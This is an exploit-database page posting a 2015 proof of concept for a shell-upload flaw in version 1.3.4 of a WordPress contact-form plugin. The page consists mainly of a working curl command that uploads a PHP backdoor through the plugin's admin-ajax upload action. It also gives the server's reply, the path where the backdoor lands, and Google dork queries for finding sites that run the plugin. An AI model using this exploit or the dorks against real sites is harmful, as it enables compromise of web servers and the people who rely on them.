[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload Vulnerability

Author
Claudio Viviani
Risk
[
Security Risk High
]
0day-ID
0day-ID-23504
Category
web applications
Date add
13-04-2015
Platform
php
######################
 
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
 
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
 
# Date : 2015-04-1
 
# Dork Google: index of website-contact-form-with-file-upload
               index of /uploads/contact_files/
 
# Tested on : Linux BackBox 4.0 / curl 7.35.0
 
#####################
 
# Info :  
 
 The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
 
 
######################
 
# PoC:
 
 curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
  
  
 Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}
 
 
######################
 
# Backdoor Location:
 
 http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php

#  0day.today [2024-11-16]  #